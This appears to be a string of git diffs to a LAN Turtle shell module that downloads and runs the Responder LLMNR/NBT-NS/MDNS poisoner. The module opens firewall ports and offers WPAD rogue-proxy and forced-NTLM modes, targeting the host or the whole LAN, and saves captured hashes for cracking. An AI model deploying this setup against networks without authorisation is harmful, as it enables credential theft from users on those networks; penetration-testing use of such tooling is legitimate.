     "responderconf"   "Edit Responder.conf" \

--- a/modules/responder
+++ b/modules/responder
@@ -1,5 +1,5 @@
 #!/bin/bash /usr/lib/turtle/turtle_module
-VERSION="1.0"
+VERSION="2.0"
 DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
 CONF=/tmp/responder.form
 AUTHOR=IMcPwn
@@ -11,84 +11,183 @@ AUTHOR=IMcPwn
 : ${DIALOG_ESC=255}
 
 function start {
-  if [ -s /etc/config/responder ];
-  then
-    if [[ ! $(opkg list-installed | grep git) ]]; then
-      opkg update && opkg install git
-    fi
-  
-    if [[ ! $(opkg list-installed | grep python-sqlite3) ]]; then
-      opkg update && opkg install python-sqlite3
-    fi
-
-    if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
-        rm -r /etc/turtle/Responder
-        git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
-    fi
-    
-    responder_log=$(uci get responder.log)
-    case $responder_log in
-      sshfs)
-        if pgrep sshfs > /dev/null; then 
-          if [ -s /etc/turtle/Responder/Responder.db ]; then
-            rm -r /etc/turtle/Responder/Responder.db
-          fi
-          if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]]; then
-            rm -r /etc/turtle/Responder/logs
-            mkdir -p /sshfs/Responder/logs
-            ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
-          fi
-          echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-          echo "Responder started and logs are being saved to /sshfs/Responder/logs"
-        else 
-          echo "SSHFS not running"
-        fi
-        ;;
-      tmp)
-        if [ -s /etc/turtle/Responder/Responder.db ]; then
-          rm -r /etc/turtle/Responder/Responder.db
-        fi
-        if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
-          rm -r /etc/turtle/Responder/logs
-          mkdir -p /tmp/Responder/logs
-          ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
-        fi
-          echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-          echo "Responder started and logs are being saved to /tmp/Responder/logs"
-        ;;
-    esac
-  else
-    echo "Responder not configured."
-  fi
+	if [ -s /etc/config/responder ]; 
+	then
+		responder_interface=$(uci get responder.interface)
+		responder_log=$(uci get responder.log)
+		responder_mode=$(uci get responder.mode)
+		
+		if [[ $responder_interface == "" ]];
+		then
+			echo "Responder interface not configured."
+			exit 1
+		fi
+		
+		if [[ $responder_log == "" ]];
+		then
+			echo "Responder log location not configured."
+			exit 1
+		fi
+		
+		if [[ $responder_mode == "" ]];
+		then
+			echo "Responder mode not configured."
+			exit 1
+		fi
+	
+		if [[ ! $(opkg list-installed | grep git) ]];
+		then
+			echo "Git not installed. Installing..."
+			opkg update && opkg install git
+		fi
+		
+		if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
+		then
+			echo "Python-sqlite3 not installed. Installing..."
+			opkg update && opkg install python-sqlite3
+		fi
+		
+		if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
+		then
+			rm -r /etc/turtle/Responder
+			echo "Responder not downloaded. Downloading..."
+			git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
+		fi
+		
+		case $responder_mode in
+			1) mode="";;
+			2) mode="-A";;
+			3) mode="-w";;
+			4) mode="-r";;
+			5) mode="-F";;
+			6) mode="-f";;
+			7) mode="-v";;
+			8) mode="-r -F";;
+			9) mode="-r -F -f";;
+		esac
+	
+		case $responder_log in
+			sshfs)
+				if pgrep sshfs > /dev/null;
+				then
+					if [[ $responder_interface == "eth1" ]];
+					then
+						iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
+						iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
+					fi
+					
+					if [ -s /etc/turtle/Responder/Responder.db ]; 
+					then
+						rm -r /etc/turtle/Responder/Responder.db
+					fi
+					
+					if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]]; 
+					then
+						rm -r /etc/turtle/Responder/logs
+						mkdir -p /sshfs/Responder/logs
+						ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+					fi
+					
+					echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
+					echo "Responder started and logs are being saved to /sshfs/Responder"
+				else 
+					echo "SSHFS not running"
+				fi
+				;;
+			tmp)
+				if [[ $responder_interface == "eth1" ]]; 
+				then
+					iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
+					iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
+				fi
+				
+				if [ -s /etc/turtle/Responder/Responder.db ]; 
+				then
+					rm -r /etc/turtle/Responder/Responder.db
+				fi
+				
+				if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
+					rm -r /etc/turtle/Responder/logs
+					mkdir -p /tmp/Responder/logs
+					ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+				fi
+				
+				echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
+				echo "Responder started and logs are being saved to /tmp/Responder"
+				;;
+		esac
+	else
+		echo "Responder not configured."
+		exit 1
+fi
 }
 
 function stop {
-  kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
+	responder_interface=$(uci get responder.interface)
+	if [[ $responder_interface == "eth1" ]]; 
+	then
+		#iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
+		iptables -t filter -D INPUT -i eth1 -j ACCEPT
+		iptables -D INPUT -i eth1 -p udp --dport 53 -j ACCEPT
+		iptables -D INPUT -i eth1 -p udp --dport 137 -j ACCEPT
+		iptables -D INPUT -i eth1 -p udp --dport 138 -j ACCEPT
+		iptables -D INPUT -i eth1 -p udp --dport 389 -j ACCEPT
+		iptables -D INPUT -i eth1 -p udp --dport 5553 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 21 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 25 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 110 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 139 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 389 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 445 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 1433 -j ACCEPT
+		iptables -D INPUT -i eth1 -p tcp --dport 3141 -j ACCEPT
+	fi
+	
+	kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
 }
 
 function status {
-  if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
+	if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
 }
 
-function configure {
-  if [ -s /etc/config/responder ];
-  then
-    responder_log=$(uci get responder.log)
-  else
-    touch /etc/config/responder
-  fi
 
-  dialog --ok-label "Submit" \
-    --help-button \
-    --title "Responder Configuration" \
+function log {
+dialog --ok-label "Submit" \
+    --title "Responder Log Configuration" \
+	--help-button \
     --radiolist "\n\
-Responder will listen on a variety of ports to gather credentials. See Help for more information.\n\nNote: the first time you run this module it may take a long time to load because of dependencies.\n\nThe log files can be saved to SSHFS or tmp.\n" 16 60 3\
+The log files can be saved to SSHFS or tmp.\n" 16 60 3\
     1 "Save log to SSHFS if available." off\
-    2 "Save log to /tmp/" off\
+    2 "Save log to /tmp" off\
   2>$CONF
-
   return=$?
-
   case $return in
     $DIALOG_OK)
       LOG=$(cat $CONF)
@@ -101,28 +200,156 @@ Responder will listen on a variety of ports to gather credentials. See Help for 
           uci set responder.log="tmp"
           uci commit responder
           ;;
-      esac
+  esac
+  configure
     ;;
-    $DIALOG_CANCEL)
-      rm $CONF
-      clear
-      exit;;
-    $DIALOG_HELP)
-      dialog --title "Help" \
-        --msgbox "\
-Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
-By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
-The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
+	$DIALOG_CANCEL)
+      configure;;
+    $DIALOG_ESC)
+      configure;;
+	$DIALOG_HELP)
+		dialog --title "Help" --msgbox "\n\
 All activity will be logged to Responder-Session.log\n\
 Analyze mode will be logged to Analyze-Session.log\n\
 Poisoning will be logged to Poisoners-Session.log\n\n\
 All hashes are dumped an unique file John Jumbo compliant, using this format:\n\
 (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\
-For even more information, see: https://github.com/SpiderLabs/Responder\n\
-" 25 60
-      configure
-      ;;
-    $DIALOG_ESC)
-      clear;;
+" 18 72
+configure
   esac
+}
+
+function interface {
+dialog --ok-label "Submit" \
+    --title "Responder Interface Configuration" \
+    --radiolist "\n\
+Responder can target the Host machine (The computer the LAN Turtle is plugged in to) or the LAN (The network the LAN Turtle is connected to).\n" 16 60 3\
+    1 "Target just the Host machine (br-lan)." off\
+    2 "Target the entire LAN (eth1)." off\
+  2>$CONF
+  return=$?
+  case $return in
+    $DIALOG_OK)
+      INTERFACE=$(cat $CONF)
+      case $INTERFACE in
+        1)
+          uci set responder.interface="br-lan"
+          uci commit responder
+          ;;
+        2)
+          uci set responder.interface="eth1"
+          uci commit responder
+          ;;
+      esac
+	  configure
+    ;;
+	$DIALOG_CANCEL)
+      configure;;
+    $DIALOG_ESC)
+      configure;;
+  esac
+}
+
+function mode {
+  dialog --ok-label "Submit" \
+    --title "Responder Mode" \
+	--help-button \
+    --radiolist "Choose mode\n \n" 20 60 10\
+	1 "Default mode" on\
+    2 "Analyze mode" off\
+    3 "Start WPAD rouge proxy server" off\
+    4 "Enable answers for netbios suffix queries" off\
+    5 "Force NTLM/Basic Authentication" off\
+    6 "Fingerprint hosts" off\
+    7 "Enable verbose" off\
+    8 "Options 4 and 5" off\
+    9 "Options 4, 5, and 6" off\
+  2>$CONF
+  return=$?
+  case $return in
+    $DIALOG_OK)
+      mode=$(cat $CONF)
+      case $mode in
+        1)
+          uci set responder.mode="1"
+          uci commit responder;;
+        2)
+          uci set responder.mode="2"
+          uci commit responder;;
+        3)
+          uci set responder.mode="3"
+          uci commit responder;;
+        4)
+          uci set responder.mode="4"
+          uci commit responder;;
+        5)
+          uci set responder.mode="5"
+          uci commit responder;;
+        6)
+          uci set responder.mode="6"
+          uci commit responder;;
+        7)
+          uci set responder.mode="7"
+          uci commit responder;;
+        8)
+          uci set responder.mode="8"
+          uci commit responder;;
+		8)
+          uci set responder.mode="9"
+          uci commit responder;;
+      esac
+      configure
+    ;;
+    $DIALOG_CANCEL)
+      configure;;
+    $DIALOG_ESC)
+      configure;;
+	$DIALOG_HELP)
+		dialog --title "Help" --msgbox "\n\
+Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
+By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
+The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
+For more information, see: https://github.com/SpiderLabs/Responder\n\
+" 18 72
+configure
+  esac
+}
+
+function responderconf {
+dialog \
+    --title "Editing: /etc/turtle/Responder/Responder.conf" \
+    --editbox /etc/turtle/Responder/Responder.conf 18 72\
+	--help-button \
+  2>$CONF
+  return=$?
+  case $return in
+    $DIALOG_OK)
+      cat $CONF | {
+        cat $CONF > /etc/turtle/Responder/Responder.conf
+        rm $CONF
+      };;
+	  esac
+	  configure
+}
+
+function configure {
+  if [[ ! -s /etc/config/responder ]];
+  then
+    touch /etc/config/responder
+  fi
+
+  dialog --title "" --menu "" 15 60 5 \
+    "log"	"Specify log location" \
+    "interface"   "Specify interface to target" \
+    "mode"       "Specify Responder mode" \
+    "responderconf"   "Edit Responder.conf" \
+    "back"      "Return to previous menu" 2> $CONF
+  result=$(cat $CONF && rm $CONF &>/dev/null)
+  case $result in
+    "log") log;;
+    "interface") interface;;
+    "mode") mode;;
+    "responderconf") responderconf;;
+    "back") exit;;
+esac
 }

--- a/modules/responder
+++ b/modules/responder
@@ -33,7 +33,7 @@ if [ -s /etc/config/responder ];
           if [ -s /etc/turtle/Responder/Responder.db ]; then
             rm -r /etc/turtle/Responder/Responder.db
           fi
-          if [ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]; then
+          if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]]; then
             rm -r /etc/turtle/Responder/logs
             mkdir -p /sshfs/Responder/logs
             ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
@@ -48,7 +48,7 @@ if [ -s /etc/config/responder ];
         if [ -s /etc/turtle/Responder/Responder.db ]; then
           rm -r /etc/turtle/Responder/Responder.db
         fi
-        if [ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]; then
+        if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]]; then
           rm -r /etc/turtle/Responder/logs
           mkdir -p /tmp/Responder/logs
           ln -s /tmp/Responder/logs /etc/turtle/Responder/logs

--- a/modules/responder
+++ b/modules/responder
@@ -114,6 +114,7 @@ function start {
           echo "Responder started and logs are being saved to /sshfs/Responder"
         else 
           echo "SSHFS not running"
+          exit 1
         fi
         ;;
       tmp)
@@ -203,11 +204,11 @@ function check_internet {
 
 function log {
 dialog --ok-label "Submit" \
-    --title "Responder Log Configuration" \
+  --title "Responder Log Configuration" \
   --extra-button \
   --extra-label "View log" \
   --help-button \
-    --radiolist "\n\
+  --radiolist "\n\
 The log files can be saved to SSHFS or tmp.\n" 16 60 3\
     1 "Save log to SSHFS if available." off\
     2 "Save log to /tmp" off\

--- a/modules/responder
+++ b/modules/responder
@@ -77,7 +77,7 @@ function configure {
     --help-button \
     --title "Responder Configuration" \
     --radiolist "\n\
-Responder is an LLMNR, NBT-NS and MDNS poisoner.\n\nNOTICE: The first time you run this module it may take a long time to load. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
+For information on the different log files, see "Help"\n\nNOTICE: The first time you run this module it may take a long time to load because of dependencies. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
     1 "Save log to SSHFS if available." off\
     2 "Save log to /tmp/" off\
   2>$CONF
@@ -105,11 +105,16 @@ Responder is an LLMNR, NBT-NS and MDNS poisoner.\n\nNOTICE: The first time you r
     $DIALOG_HELP)
       dialog --title "Help" \
         --msgbox "\
-Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
+Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
 By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
 The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
+All activity will be logged to Responder-Session.log\n\
+Analyze mode will be logged to Analyze-Session.log\n\
+Poisoning will be logged to Poisoners-Session.log\n\n\
+All hashes are dumped an unique file John Jumbo compliant, using this format:\n\
+(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\
 For more information, see: https://github.com/SpiderLabs/Responder\n\
-" 20 60
+" 25 60
       configure
       ;;
     $DIALOG_ESC)

--- a/modules/responder
+++ b/modules/responder
@@ -33,7 +33,7 @@ if [ -s /etc/config/responder ];
           if [ -s /etc/turtle/Responder/Responder.db ]; then
             rm -r /etc/turtle/Responder/Responder.db
           fi
-          if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]]; then
+          if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]]; then
             rm -r /etc/turtle/Responder/logs
             mkdir -p /sshfs/Responder/logs
             ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
@@ -48,7 +48,7 @@ if [ -s /etc/config/responder ];
         if [ -s /etc/turtle/Responder/Responder.db ]; then
           rm -r /etc/turtle/Responder/Responder.db
         fi
-        if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]]; then
+        if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
           rm -r /etc/turtle/Responder/logs
           mkdir -p /tmp/Responder/logs
           ln -s /tmp/Responder/logs /etc/turtle/Responder/logs

--- a/modules/responder
+++ b/modules/responder
@@ -12,7 +12,7 @@ AUTHOR=IMcPwn
 
 function start {
   if [ ! -s /usr/bin/git ]; then
-     opkg update && opkg install git 
+     opkg update && opkg install git
   fi
   
   if [ ! -s /usr/lib/python2.7/sqlite3/dbapi2.py ]; then
@@ -30,10 +30,14 @@ if [ -s /etc/config/responder ];
     case $responder_log in
       sshfs)
         if pgrep sshfs > /dev/null; then 
-          echo "SSHFS Running"
-          rm -r /etc/turtle/Responder/logs
-          mkdir -p /sshfs/Responder/logs
-          ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+          if [ -s /etc/turtle/Responder/Responder.db ]; then
+		      rm -r /etc/turtle/Responder/Responder.db
+		    fi
+		    if [ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]; then
+            rm -r /etc/turtle/Responder/logs
+            mkdir -p /sshfs/Responder/logs
+	          ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+		    fi
           echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
           echo responder started and logs are being saved to /sshfs/Responder/logs
         else 
@@ -41,11 +45,16 @@ if [ -s /etc/config/responder ];
         fi
         ;;
       tmp)
-        rm -r /etc/turtle/Responder/logs
-        mkdir -p /tmp/Responder/logs
-        ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
-        echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-        echo responder started and logs are being saved to /tmp/Responder/logs
+	      if [ -s /etc/turtle/Responder/Responder.db ]; then
+		      rm -r /etc/turtle/Responder/Responder.db
+		    fi
+		    if [ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]; then
+          rm -r /etc/turtle/Responder/logs
+          mkdir -p /tmp/Responder/logs
+	        ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+		    fi
+          echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+          echo responder started and logs are being saved to /tmp/Responder/logs
         ;;
     esac
   else

--- a/modules/responder
+++ b/modules/responder
@@ -192,11 +192,11 @@ The log files can be saved to SSHFS or tmp.\n" 16 60 3\
     $DIALOG_OK)
       LOG=$(cat $CONF)
       case $LOG in
-        1)
+	1)
           uci set responder.log="sshfs"
           uci commit responder
           ;;
-        2)
+	2)
           uci set responder.log="tmp"
           uci commit responder
           ;;
@@ -232,11 +232,11 @@ Responder can target the Host machine (The computer the LAN Turtle is plugged in
     $DIALOG_OK)
       INTERFACE=$(cat $CONF)
       case $INTERFACE in
-        1)
+	1)
           uci set responder.interface="br-lan"
           uci commit responder
           ;;
-        2)
+	2)
           uci set responder.interface="eth1"
           uci commit responder
           ;;
@@ -255,7 +255,7 @@ function mode {
     --title "Responder Mode" \
 	--help-button \
     --radiolist "Choose mode\n \n" 20 60 10\
-	1 "Default mode" on\
+    1 "Default mode" on\
     2 "Analyze mode" off\
     3 "Start WPAD rouge proxy server" off\
     4 "Enable answers for netbios suffix queries" off\
@@ -270,28 +270,28 @@ function mode {
     $DIALOG_OK)
       mode=$(cat $CONF)
       case $mode in
-        1)
+	1)
           uci set responder.mode="1"
           uci commit responder;;
-        2)
+	2)
           uci set responder.mode="2"
           uci commit responder;;
-        3)
+	3)
           uci set responder.mode="3"
           uci commit responder;;
-        4)
+	4)
           uci set responder.mode="4"
           uci commit responder;;
-        5)
+	5)
           uci set responder.mode="5"
           uci commit responder;;
-        6)
+	6)
           uci set responder.mode="6"
           uci commit responder;;
-        7)
+	7)
           uci set responder.mode="7"
           uci commit responder;;
-        8)
+	8)
           uci set responder.mode="8"
           uci commit responder;;
 	9)
@@ -333,10 +333,10 @@ dialog \
 }
 
 function configure {
-  if [[ ! -s /etc/config/responder ]];
-  then
-    touch /etc/config/responder
-  fi
+if [[ ! -s /etc/config/responder ]];
+then
+	touch /etc/config/responder
+fi
 
   dialog --title "" --menu "" 15 60 5 \
     "log"	      "Specify log location" \

--- a/modules/responder
+++ b/modules/responder
@@ -224,7 +224,7 @@ The log files can be saved to SSHFS or tmp.\n" 16 60 3\
 				;;
 			*)
 				echo "Responder log location not configured."
-				log;;
+				;;
 		esac
 		log;;
 	$DIALOG_HELP)

--- a/modules/responder
+++ b/modules/responder
@@ -11,11 +11,11 @@ AUTHOR=IMcPwn
 : ${DIALOG_ESC=255}
 
 function start {
-  if [ ! -s /usr/bin/git ]; then
+  if [[ ! $(opkg list-installed | grep git) ]]; then
      opkg update && opkg install git
   fi
   
-  if [ ! -s /usr/lib/python2.7/sqlite3/dbapi2.py ]; then
+  if [[ ! $(opkg list-installed | grep python-sqlite3) ]]; then
      opkg update && opkg install python-sqlite3
   fi
 

--- a/modules/responder
+++ b/modules/responder
@@ -311,7 +311,7 @@ By default, the tool will only answer to File Server Service request, which is f
 The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
 For more information, see: https://github.com/SpiderLabs/Responder\n\
 " 18 72
-log
+mode
   esac
 }
 

--- a/modules/responder
+++ b/modules/responder
@@ -39,7 +39,7 @@ if [ -s /etc/config/responder ];
             ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
           fi
           echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-          echo responder started and logs are being saved to /sshfs/Responder/logs
+          echo "Responder started and logs are being saved to /sshfs/Responder/logs"
         else 
           echo "SSHFS not running"
         fi
@@ -54,7 +54,7 @@ if [ -s /etc/config/responder ];
           ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
         fi
           echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-          echo responder started and logs are being saved to /tmp/Responder/logs
+          echo "Responder started and logs are being saved to /tmp/Responder/logs"
         ;;
     esac
   else

--- a/modules/responder
+++ b/modules/responder
@@ -294,7 +294,7 @@ function mode {
         8)
           uci set responder.mode="8"
           uci commit responder;;
-		8)
+	9)
           uci set responder.mode="9"
           uci commit responder;;
       esac

--- a/modules/responder
+++ b/modules/responder
@@ -33,7 +33,7 @@ if [ -s /etc/config/responder ];
           if [ -s /etc/turtle/Responder/Responder.db ]; then
             rm -r /etc/turtle/Responder/Responder.db
           fi
-          if [ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]; then
+          if [ $(readlink /etc/turtle/Responder/logs) ! == "/sshfs/Responder/logs" ]; then
             rm -r /etc/turtle/Responder/logs
             mkdir -p /sshfs/Responder/logs
             ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
@@ -48,7 +48,7 @@ if [ -s /etc/config/responder ];
         if [ -s /etc/turtle/Responder/Responder.db ]; then
           rm -r /etc/turtle/Responder/Responder.db
         fi
-        if [ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]; then
+        if [ $(readlink /etc/turtle/Responder/logs) ! == "/tmp/Responder/logs" ]; then
           rm -r /etc/turtle/Responder/logs
           mkdir -p /tmp/Responder/logs
           ln -s /tmp/Responder/logs /etc/turtle/Responder/logs

--- a/modules/responder
+++ b/modules/responder
@@ -53,7 +53,7 @@ function start {
     then
       check_internet
       rm -rf /etc/turtle/Responder
-      echo "Responder not downloaded or corrupted. Downloading..."
+      echo "Responder files are not valid. Downloading..."
       git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
     fi
     
@@ -227,13 +227,12 @@ The log files can be saved to SSHFS or tmp.\n" 16 60 3\
           uci commit responder
           ;;
   esac
-  configure
-  ;;
+  configure;;
     $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
       configure;;
-  $DIALOG_EXTRA)
+    $DIALOG_EXTRA)
     responder_log=$(uci get responder.log)
     case $responder_log in
       sshfs)
@@ -281,8 +280,7 @@ Responder can target the Host machine (The computer the LAN Turtle is plugged in
           uci commit responder
           ;;
       esac
-    configure
-    ;;
+    configure;;
     $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
@@ -338,13 +336,12 @@ function mode {
           uci set responder.mode="9"
           uci commit responder;;
       esac
-      configure
-      ;;
+      configure;;
     $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
       configure;;
-  $DIALOG_HELP)
+    $DIALOG_HELP)
     dialog --title "Help" --msgbox "\n\
 Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
 By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
@@ -372,16 +369,13 @@ dialog \
     $DIALOG_HELP)
       dialog --title "Help" \
         --msgbox "For information on this configuration, see: https://github.com/SpiderLabs/Responder" 20 60
-      responderconf
-      ;;
+      responderconf;;
     $DIALOG_CANCEL)
       rm $CONF
-      configure
-      ;;
+      configure;;
     $DIALOG_ESC)
       rm $CONF
-      configure
-      ;;
+      configure;;
   esac
 }
 
@@ -404,5 +398,5 @@ fi
     "mode") mode;;
     "responderconf") responderconf;;
     "back") exit;;
-esac
+  esac
 }

--- a/modules/responder
+++ b/modules/responder
@@ -1,5 +1,5 @@
 #!/bin/bash /usr/lib/turtle/turtle_module
-VERSION="2.1"
+VERSION="2.2"
 DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
 CONF=/tmp/responder.form
 AUTHOR=IMcPwn
@@ -49,8 +49,8 @@ function start {
 		
 		if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
 		then
-			rm -r /etc/turtle/Responder
-			echo "Responder not downloaded. Downloading..."
+			rm -rf /etc/turtle/Responder
+			echo "Responder not downloaded or corrupted. Downloading..."
 			git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
 		fi
 		
@@ -64,6 +64,12 @@ function start {
 			7) mode="-v";;
 			8) mode="-r -F";;
 			9) mode="-r -F -f";;
+			*)
+				echo "Responder configuration not valid."
+				echo "Please re-configure then try again."
+				rm -f /etc/config/responder
+				exit 1
+				;;
 		esac
 	
 		case $responder_log in
@@ -91,12 +97,12 @@ function start {
 					
 					if [ -s /etc/turtle/Responder/Responder.db ]; 
 					then
-						rm -r /etc/turtle/Responder/Responder.db
+						rm -f /etc/turtle/Responder/Responder.db
 					fi
 					
 					if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]]; 
 					then
-						rm -r /etc/turtle/Responder/logs
+						rm -rf /etc/turtle/Responder/logs
 						mkdir -p /sshfs/Responder/logs
 						ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
 					fi
@@ -129,11 +135,11 @@ function start {
 				
 				if [ -s /etc/turtle/Responder/Responder.db ]; 
 				then
-					rm -r /etc/turtle/Responder/Responder.db
+					rm -f /etc/turtle/Responder/Responder.db
 				fi
 				
